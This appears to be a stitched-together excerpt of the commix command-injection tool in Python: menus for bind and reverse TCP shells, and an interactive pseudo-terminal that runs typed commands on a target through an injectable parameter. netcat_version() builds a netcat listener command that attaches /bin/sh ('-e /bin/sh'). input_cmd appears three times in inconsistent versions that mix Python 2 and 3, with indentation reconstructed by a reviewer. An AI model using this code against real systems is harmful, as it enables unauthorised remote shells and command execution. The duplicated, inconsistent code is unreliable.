def bind_tcp_options():
    """Ask which kind of bind-TCP shell to use and return the outcome.

    The prompt repeats until one of these happens:

    * '1' or '2' is entered: the answer comes from ``netcat_version()`` or
      ``other_bind_shells()`` respectively. If that answer is itself listed
      in ``settings.SHELL_OPTIONS`` it is returned as-is; otherwise
      ``shell_success()`` is called first and the answer is then returned.
    * The input is listed in ``settings.SHELL_OPTIONS``: it is returned
      unchanged (original case preserved).
    * 'quit' is entered: the process ends through ``sys.exit(0)``.

    ``set rhost <value>`` / ``set lport <value>`` hand the value to
    ``check_rhost`` / ``check_lport`` and re-prompt; any other ``set ...``
    input is ignored without a message.
    """
    # NOTE(review): this listing lost its indentation and the line breaks
    # inside the menu literals; the block nesting is reconstructed and the
    # literals are kept exactly as shown - confirm against the project file.
    prompt = (
        " ---[ " + Style.BRIGHT + Fore.BLUE + "Bind TCP shells" + Style.RESET_ALL
        + " ]--- Type '" + Style.BRIGHT + "1" + Style.RESET_ALL
        + "' to use a netcat bind TCP shell. Type '" + Style.BRIGHT + "2" + Style.RESET_ALL
        + "' for other bind TCP shells. commix(" + Style.BRIGHT + Fore.RED + "bind_tcp"
        + Style.RESET_ALL + ") > "
    )

    while True:
        bind_tcp_option = raw_input(prompt)

        # Answers '1' and '2' delegate to a sub-menu; its result replaces the
        # raw answer and decides whether we leave the loop or hand a shell
        # option back to the caller.
        if bind_tcp_option in ("1", "2"):
            if bind_tcp_option == "1":
                bind_tcp_option = netcat_version()
            else:
                bind_tcp_option = other_bind_shells()
            if bind_tcp_option.lower() in settings.SHELL_OPTIONS:
                return bind_tcp_option
            shell_success()
            break

        choice = bind_tcp_option.lower()
        if choice == "bind_tcp":
            warn_msg = "You are already into the '" + choice + "' mode."
            print settings.print_warning_msg(warn_msg)
            continue
        if choice == "?":
            menu.os_shell_options()
            continue
        if choice == "quit":
            sys.exit(0)
        if choice in settings.SHELL_OPTIONS:
            return bind_tcp_option

        # "set <name> <value>": characters 4-8 carry the setting name and
        # everything from index 10 on is the value.
        if bind_tcp_option[0:3].lower() == "set":
            setting_name = bind_tcp_option[4:9].lower()
            if setting_name == "rhost":
                check_rhost(bind_tcp_option[10:])
            elif setting_name == "lport":
                check_lport(bind_tcp_option[10:])
            continue

        err_msg = "The '" + bind_tcp_option + "' option, is not valid."
        print settings.print_error_msg(err_msg)

    return bind_tcp_option
def check_os_shell_options(cmd, technique, go_back, no_result):
    """Dispatch *cmd* when it is one of the built-in shell options.

    Returns:
        ``None`` when *cmd* is not in ``settings.SHELL_OPTIONS``, or when it
        is "?" (after ``menu.os_shell_options()`` has been called);
        ``True``/``False`` for "back", depending on whether
        ``next_attack_vector(technique, go_back)`` compares equal to ``True``;
        *cmd* itself for every other listed option.

    ``no_result`` is accepted but not used in this function.
    """
    # NOTE(review): nesting reconstructed from a listing without indentation;
    # the final "return cmd" is taken to belong to the "?" / "back" chain.
    if cmd not in settings.SHELL_OPTIONS:
        return None

    if cmd == "?":
        menu.os_shell_options()
        return None

    if cmd == "back":
        moved_on = next_attack_vector(technique, go_back)
        # Kept as an equality test against True so that a truthy non-True
        # result is still reported as False, as before.
        return True if moved_on == True else False

    return cmd
def netcat_version():
    """Ask which netcat binary to use and build the listener command line.

    Returns either the raw input, when it is listed in
    ``settings.SHELL_OPTIONS``, or a command string of the form
    ``<netcat path> -l -p <settings.LPORT> -e /bin/sh``.

    That string starts a netcat listener which attaches ``/bin/sh`` to an
    incoming connection; a netcat process launched with ``-e`` and a shell
    path is the artefact process-creation monitoring can match on.

    ``set rhost <value>`` / ``set lport <value>`` hand the value to
    ``check_rhost`` / ``check_lport`` and re-prompt.
    """
    # NOTE(review): this listing lost its indentation and the line breaks
    # inside the menu literals; nesting is reconstructed and the literals are
    # kept exactly as shown - confirm against the project file.

    # Netcat alternatives, keyed by the menu answer that selects each one.
    NETCAT_ALTERNATIVES = ["/bin/nc", "/bin/busybox nc", "/bin/nc.traditional"]
    binary_for_answer = {
        "1": NETCAT_ALTERNATIVES[0],  # default Netcat
        "2": NETCAT_ALTERNATIVES[1],  # Netcat for Busybox
        "3": NETCAT_ALTERNATIVES[2],  # Netcat-Traditional
    }

    prompt = (
        " ---[ " + Style.BRIGHT + Fore.BLUE + "Unix-like targets" + Style.RESET_ALL
        + " ]--- Type '" + Style.BRIGHT + "1" + Style.RESET_ALL
        + "' to use the default Netcat on target host. Type '" + Style.BRIGHT + "2"
        + Style.RESET_ALL
        + "' to use Netcat for Busybox on target host. Type '" + Style.BRIGHT + "3"
        + Style.RESET_ALL
        + "' to use Netcat-Traditional on target host. commix(" + Style.BRIGHT + Fore.RED
        + "bind_tcp_netcat" + Style.RESET_ALL + ") > "
    )

    while True:
        nc_version = raw_input(prompt)

        if nc_version in binary_for_answer:
            nc_alternative = binary_for_answer[nc_version]
            break

        lowered = nc_version.lower()
        if lowered == "bind_tcp":
            warn_msg = "You are already into the '" + lowered + "' mode."
            print settings.print_warning_msg(warn_msg)
            continue
        if lowered == "?":
            menu.os_shell_options()
            continue
        if lowered in settings.SHELL_OPTIONS:
            return nc_version

        # "set <name> <value>": characters 4-8 carry the setting name and
        # everything from index 10 on is the value.
        if nc_version[0:3].lower() == "set":
            setting_name = nc_version[4:9].lower()
            if setting_name == "rhost":
                check_rhost(nc_version[10:])
            elif setting_name == "lport":
                check_lport(nc_version[10:])
            continue

        err_msg = "The '" + nc_version + "' option, is not valid."
        print settings.print_error_msg(err_msg)

    # Plain concatenation is kept, so settings.LPORT has to be a string here.
    return nc_alternative + " -l -p " + settings.LPORT + " -e /bin/sh"
def reverse_tcp_options():
    """Ask which kind of reverse-TCP shell to use and return the outcome.

    The prompt repeats until one of these happens:

    * '1' or '2' is entered: the answer comes from ``netcat_version()`` or
      ``other_reverse_shells()`` respectively. If that answer is itself
      listed in ``settings.SHELL_OPTIONS`` it is returned as-is; otherwise
      ``shell_success()`` is called first and the answer is then returned.
    * The input is listed in ``settings.SHELL_OPTIONS``: it is returned
      unchanged (original case preserved).
    * 'quit' is entered: the process ends through ``sys.exit(0)``.

    ``set lhost <value>`` / ``set lport <value>`` hand the value to
    ``check_lhost`` / ``check_lport`` and re-prompt; any other ``set ...``
    input is ignored without a message.
    """
    # NOTE(review): this listing lost its indentation and the line breaks
    # inside the menu literals; nesting is reconstructed and the literals are
    # kept exactly as shown - confirm against the project file.
    prompt = (
        " ---[ " + Style.BRIGHT + Fore.BLUE + "Reverse TCP shells" + Style.RESET_ALL
        + " ]--- Type '" + Style.BRIGHT + "1" + Style.RESET_ALL
        + "' to use a netcat reverse TCP shell. Type '" + Style.BRIGHT + "2" + Style.RESET_ALL
        + "' for other reverse TCP shells. commix(" + Style.BRIGHT + Fore.RED + "reverse_tcp"
        + Style.RESET_ALL + ") > "
    )

    while True:
        reverse_tcp_option = raw_input(prompt)

        # Answers '1' and '2' delegate to a sub-menu; its result replaces the
        # raw answer and decides whether we leave the loop or hand a shell
        # option back to the caller.
        if reverse_tcp_option in ("1", "2"):
            if reverse_tcp_option == "1":
                reverse_tcp_option = netcat_version()
            else:
                reverse_tcp_option = other_reverse_shells()
            if reverse_tcp_option.lower() in settings.SHELL_OPTIONS:
                return reverse_tcp_option
            shell_success()
            break

        choice = reverse_tcp_option.lower()
        if choice == "?":
            menu.os_shell_options()
            continue
        if choice == "quit":
            sys.exit(0)
        if choice in settings.SHELL_OPTIONS:
            return reverse_tcp_option

        # "set <name> <value>": characters 4-8 carry the setting name and
        # everything from index 10 on is the value.
        if reverse_tcp_option[0:3].lower() == "set":
            setting_name = reverse_tcp_option[4:9].lower()
            if setting_name == "lhost":
                check_lhost(reverse_tcp_option[10:])
            elif setting_name == "lport":
                check_lport(reverse_tcp_option[10:])
            continue

        err_msg = "The '" + reverse_tcp_option + "' option, is not valid."
        print settings.print_error_msg(err_msg)

    return reverse_tcp_option
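def input_cmd(dns_server, http_request_method, url, vuln_parameter, technique):
    """Run the interactive pseudo-terminal prompt for this module.

    Warns when enumeration or file-access options were requested (the module
    reports them as unsupported), asks whether to open the pseudo-terminal
    (the question is skipped and answered "y" when ``menu.options.batch`` is
    set), then reads commands in a loop. Input listed in
    ``settings.SHELL_OPTIONS`` is handled locally; anything else is passed to
    ``cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter)``.

    The function does not return normally: every exit path visible here ends
    in ``os._exit(0)``. ``technique`` is accepted but not used.
    """
    # NOTE(review): block nesting is reconstructed from a listing that lost
    # its indentation - confirm against the project file.
    unsupported = []
    if menu.enumeration_options():
        unsupported.append("enumeration")
    if menu.file_access_options():
        unsupported.append("file-access")
    err_msg = " and ".join(unsupported)
    if err_msg != "":
        warn_msg = "The " + err_msg + " options are not supported "
        warn_msg += "by this module because of the structure of the exfiltrated data. "
        warn_msg += "Please try using any unix-like commands manually."
        print(settings.print_warning_msg(warn_msg))

    # Pseudo-Terminal shell
    go_back = False  # never set to True in this function; kept for the loop guard
    while True:
        if go_back == True:
            break

        if not menu.options.batch:
            question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
            gotshell = _input(settings.print_question_msg(question_msg))
        else:
            gotshell = ""
        if not gotshell:
            gotshell = "y"

        if gotshell in settings.CHOICE_YES:
            print("\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)")
            if readline_error:
                checks.no_readline_module()
            while True:
                try:
                    # Tab completer
                    if not readline_error:
                        readline.set_completer(menu.tab_completer)
                        readline_doc = getattr(readline, '__doc__', '')
                        if readline_doc is not None and 'libedit' in readline_doc:
                            # libedit-backed readline (MacOSX) binding syntax
                            readline.parse_and_bind("bind ^I rl_complete")
                        else:
                            # GNU readline (Unix) binding syntax
                            readline.parse_and_bind("tab: complete")

                    cmd = _input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    option = cmd.lower()

                    if option in settings.SHELL_OPTIONS:
                        if option == "quit" or option == "back":
                            print("")
                            os._exit(0)
                        elif option == "?":
                            menu.os_shell_options()
                        elif option == "os_shell":
                            warn_msg = "You are already into the '" + option + "' mode."
                            # Concatenate before printing: `print(x) + "\n"` is
                            # None + str on Python 3, and that TypeError was
                            # swallowed by the bare except below, silently
                            # ending the session.
                            print(settings.print_warning_msg(warn_msg) + "\n")
                        elif option == "reverse_tcp":
                            warn_msg = "This option is not supported by this module."
                            print(settings.print_warning_msg(warn_msg) + "\n")
                    else:
                        # Command execution results.
                        cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter)

                except KeyboardInterrupt:
                    print("")
                    os._exit(0)

                except:
                    # NOTE(review): any error raised above, including one from
                    # cmd_exec, ends the process with status 0 and no message,
                    # which hides failures from the operator and from logs.
                    print("")
                    os._exit(0)

        elif gotshell in settings.CHOICE_NO:
            print("")
            os._exit(0)

        elif gotshell in settings.CHOICE_QUIT:
            print("")
            os._exit(0)

        else:
            err_msg = "'" + gotshell + "' is not a valid answer."
            print(settings.print_error_msg(err_msg))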
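def input_cmd(dns_server, http_request_method, url, vuln_parameter, technique):
    """Run the interactive pseudo-terminal prompt for this module.

    Warns when enumeration or file-access options were requested (the module
    reports them as unsupported), asks whether to open the pseudo-terminal
    (the question is skipped and answered "Y" when ``menu.options.batch`` is
    set), then reads commands in a loop. Input listed in
    ``settings.SHELL_OPTIONS`` is handled locally; anything else is passed to
    ``cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter)``.

    The function does not return normally: every exit path visible here ends
    in ``os._exit(0)``. ``technique`` is accepted but not used.
    """
    # NOTE(review): block nesting is reconstructed from a listing that lost
    # its indentation - confirm against the project file.
    unsupported = []
    if menu.enumeration_options():
        unsupported.append("enumeration")
    if menu.file_access_options():
        unsupported.append("file-access")
    err_msg = " and ".join(unsupported)
    if err_msg != "":
        warn_msg = "The " + err_msg + " options are not supported "
        warn_msg += "by this module because of the structure of the exfiltrated data. "
        warn_msg += "Please try using any unix-like commands manually."
        print(settings.print_warning_msg(warn_msg))

    # Pseudo-Terminal shell
    go_back = False  # never set to True in this function; kept for the loop guard
    while True:
        if go_back == True:
            break

        if not menu.options.batch:
            question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
            gotshell = _input(settings.print_question_msg(question_msg))
        else:
            gotshell = ""
        if not gotshell:
            # NOTE(review): the answer is not lower-cased in this function, so
            # the upper-case default only matches if settings.CHOICE_YES holds
            # "Y"; otherwise batch mode would loop on the error branch -
            # confirm against settings.
            gotshell = "Y"

        if gotshell in settings.CHOICE_YES:
            print("\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)")
            if settings.READLINE_ERROR:
                checks.no_readline_module()
            while True:
                try:
                    if not settings.READLINE_ERROR:
                        checks.tab_autocompleter()

                    cmd = _input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    option = cmd.lower()

                    if option in settings.SHELL_OPTIONS:
                        if option == "quit" or option == "back":
                            print(settings.SPACE)
                            os._exit(0)
                        elif option == "?":
                            menu.os_shell_options()
                        elif option == "os_shell":
                            warn_msg = "You are already into the '" + option + "' mode."
                            # Concatenate before printing: `print(x) + "\n"` is
                            # None + str on Python 3, and that TypeError was
                            # swallowed by the bare except below, silently
                            # ending the session.
                            print(settings.print_warning_msg(warn_msg) + "\n")
                        elif option == "reverse_tcp":
                            warn_msg = "This option is not supported by this module."
                            print(settings.print_warning_msg(warn_msg) + "\n")
                    else:
                        # Command execution results.
                        cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter)

                except KeyboardInterrupt:
                    print(settings.SPACE)
                    os._exit(0)

                except:
                    # NOTE(review): any error raised above, including one from
                    # cmd_exec, ends the process with status 0 and no message,
                    # which hides failures from the operator and from logs.
                    print(settings.SPACE)
                    os._exit(0)

        elif gotshell in settings.CHOICE_NO:
            print(settings.SPACE)
            os._exit(0)

        elif gotshell in settings.CHOICE_QUIT:
            print(settings.SPACE)
            os._exit(0)

        else:
            err_msg = "'" + gotshell + "' is not a valid answer."
            print(settings.print_error_msg(err_msg))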
def input_cmd(dns_server, http_request_method, url, vuln_parameter, technique):
    """Run the interactive pseudo-terminal prompt for this module.

    Warns when enumeration or file-access options were requested (the module
    reports them as unsupported), asks on stdout/stdin whether to open the
    pseudo-terminal (the question is skipped and answered "y" when
    ``menu.options.batch`` is set), then reads commands in a loop. Input
    listed in ``settings.SHELL_OPTIONS`` is handled locally; anything else is
    passed to
    ``cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter)``.

    The function does not return normally: every exit path visible here ends
    in ``os._exit(0)``. ``technique`` is accepted but not used.
    """
    # NOTE(review): block nesting is reconstructed from a listing that lost
    # its indentation - confirm against the project file.
    unsupported = []
    if menu.enumeration_options():
        unsupported.append("enumeration")
    if menu.file_access_options():
        unsupported.append("file-access")
    err_msg = " and ".join(unsupported)
    if err_msg != "":
        warn_msg = (
            "The " + err_msg + " options are not supported "
            + "by this module because of the structure of the exfiltrated data. "
            + "Please try using any unix-like commands manually."
        )
        print settings.print_warning_msg(warn_msg)

    shell_prompt = "commix(" + Style.BRIGHT + Fore.RED + "os_shell" + Style.RESET_ALL + ") > "

    # Pseudo-Terminal shell
    go_back = False  # never set to True in this function
    go_back_again = False
    while not go_back:
        if menu.options.batch:
            gotshell = ""
        else:
            question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
            sys.stdout.write(settings.print_question_msg(question_msg))
            gotshell = sys.stdin.readline().replace("\n", "").lower()
        if len(gotshell) == 0:
            gotshell = "y"

        if gotshell not in settings.CHOICE_YES:
            # "no" and "quit" both end the process; anything else re-asks.
            if gotshell in settings.CHOICE_NO or gotshell in settings.CHOICE_QUIT:
                print ""
                os._exit(0)
            err_msg = "'" + gotshell + "' is not a valid answer."
            print settings.print_error_msg(err_msg)
            continue

        print "\nPseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
        if readline_error:
            checks.no_readline_module()

        while True:
            try:
                # Tab completer
                if not readline_error:
                    readline.set_completer(menu.tab_completer)
                    readline_doc = getattr(readline, '__doc__', '')
                    if readline_doc is not None and 'libedit' in readline_doc:
                        # libedit-backed readline (MacOSX) binding syntax
                        readline.parse_and_bind("bind ^I rl_complete")
                    else:
                        # GNU readline (Unix) binding syntax
                        readline.parse_and_bind("tab: complete")

                cmd = checks.escaped_cmd(raw_input(shell_prompt))
                option = cmd.lower()

                if option not in settings.SHELL_OPTIONS:
                    # Command execution results.
                    cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter)
                elif option in ("quit", "back"):
                    print ""
                    os._exit(0)
                elif option == "?":
                    menu.os_shell_options()
                elif option == "os_shell":
                    warn_msg = "You are already into the '" + option + "' mode."
                    print settings.print_warning_msg(warn_msg) + "\n"
                elif option == "reverse_tcp":
                    warn_msg = "This option is not supported by this module."
                    print settings.print_warning_msg(warn_msg) + "\n"

            except KeyboardInterrupt:
                print ""
                os._exit(0)

            except:
                # NOTE(review): any error raised above, including one from
                # cmd_exec, ends the process with status 0 and no message.
                print ""
                os._exit(0)